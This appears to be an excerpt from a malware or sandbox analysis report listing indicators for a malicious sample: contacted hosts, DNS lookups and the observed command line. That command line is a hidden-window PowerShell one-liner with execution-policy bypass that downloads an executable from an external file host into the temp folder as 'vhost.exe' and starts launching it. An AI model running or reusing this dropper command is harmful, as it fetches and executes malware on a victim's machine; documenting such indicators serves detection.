Technical Information
- https://u.teknik.io/roumb.exe as %temp + %\vhost.exe
- 'u.##knik.io':443
- 'x1.#.lencr.org':80
- http://x1.#.lencr.org/
- 'u.##knik.io':443
- DNS ASK u.##knik.io
- DNS ASK x1.#.lencr.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -WindowStyle Hidden -noprofile -noexit (New-Object System.Net.WebClient).DownloadFile('https://u.teknik.io/roUMb.exe', $env:TEMP + '\vhost.exe'); (New-Object -com Shell....' (with hidden window)